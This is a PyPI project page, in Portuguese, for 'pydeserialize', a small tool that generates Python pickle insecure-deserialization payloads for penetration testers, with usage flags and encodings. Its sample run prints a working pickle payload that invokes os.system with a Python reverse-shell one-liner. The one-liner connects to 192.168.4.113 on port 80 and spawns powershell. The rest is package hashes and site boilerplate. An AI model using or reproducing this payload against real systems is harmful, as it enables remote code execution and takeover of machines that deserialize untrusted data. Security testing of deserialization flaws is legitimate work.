Skip to main content

Desserialização insegura em python

Project description

Typing SVG

pydeserialize testar vulnerabilidades de desserialização insegura do python

CaracterísticasInstalação Forma de utilizaçãoDetalhesExecutando revmap


O pydeserialize é uma ferramenta que gera payloads de desserialização insegura em python. Possui uma funcionalidade que faz encode das payloads desejadas e dessa forma sendo simples e otimizada para velocidade. pydeserialize é construído para fazer apenas uma coisa - gera payloads de desserialização insegura + encodes e faz isso muito bem.

Projetei o pydeserialize para cumprir todas as responsabilidades para gera payloads e encodes, mantive um modelo consistentemente passivo para torná-lo útil para testadores de penetração.

Características

  • Gera payloads para explora vulnerabilidades de desserialização insegura em python

Forma de utilização

pydeserialize -ip 192.168.4.113 -p 80 -e shell -o Windows
pydeserialize -ip 192.168.4.113 -e b64 -p 80 -o Linux

Detalhes

           _                 _     _ _         
 ___ _ _ _| |___ ___ ___ ___|_|___| |_|___ ___ 
| . | | | . | -_|_ -| -_|  _| | .'| | |- _| -_|
|  _|_  |___|___|___|___|_| |_|__,|_|_|___|___|
|_| |___|  
     v0.1.0 - @joaoviictorti

options:
  -h, --help            show this help message and exit
  -ip IP                Insert ip
  -p PORT               Insert port
  -e {b64,shell,urlencode,hex} Insert encoding
  -o {Windows,Linux}    Insert operational system

Instalação

pydeserialize requer python3 e para baixá-lo só usar:

pip3 install pydeserialize

Executando pydeserialize

pydeserialize -ip 192.168.4.113 -p 80 -o Windows -e shell

           _                 _     _ _         
 ___ _ _ _| |___ ___ ___ ___|_|___| |_|___ ___ 
| . | | | . | -_|_ -| -_|  _| | .'| | |- _| -_|
|  _|_  |___|___|___|___|_| |_|__,|_|_|___|___|
|_| |___|  
     v0.1.0 - @joaoviictorti

b'\x80\x04\x95\xf9\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\xe1python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.113",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("powershell")\'\x94\x85\x94R\x94.'

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pydeserialize-0.1.0.tar.gz (3.7 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

pydeserialize-0.1.0-py3-none-any.whl (5.2 kB view details)

Uploaded Python 3

File details

Details for the file pydeserialize-0.1.0.tar.gz.

File metadata

  • Download URL: pydeserialize-0.1.0.tar.gz
  • Upload date:
  • Size: 3.7 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for pydeserialize-0.1.0.tar.gz
Algorithm Hash digest
SHA256 4ac0ab71262dea44e2741448ff4f9025355e63dded65dfca9a26e9c7474991e0
MD5 964b7ecf67514660069eba887f47b6b2
BLAKE2b-256 fed2113fef972f5b3ab378a3f3e41daa7c72330bb54246a1a207185720f80d80

See more details on using hashes here.

File details

Details for the file pydeserialize-0.1.0-py3-none-any.whl.

File metadata

  • Download URL: pydeserialize-0.1.0-py3-none-any.whl
  • Upload date:
  • Size: 5.2 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for pydeserialize-0.1.0-py3-none-any.whl
Algorithm Hash digest
SHA256 6beb9fd96180ffcc611e9b2c38779d26a76511b8a9c516dc5bbb10fd215918d9
MD5 eeff35a24bd1826d1842c5b6b09da074
BLAKE2b-256 ee133fe22b6ac666ce76bd4a192e6580a3942d2516f9858f39a83f676e4de69a

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page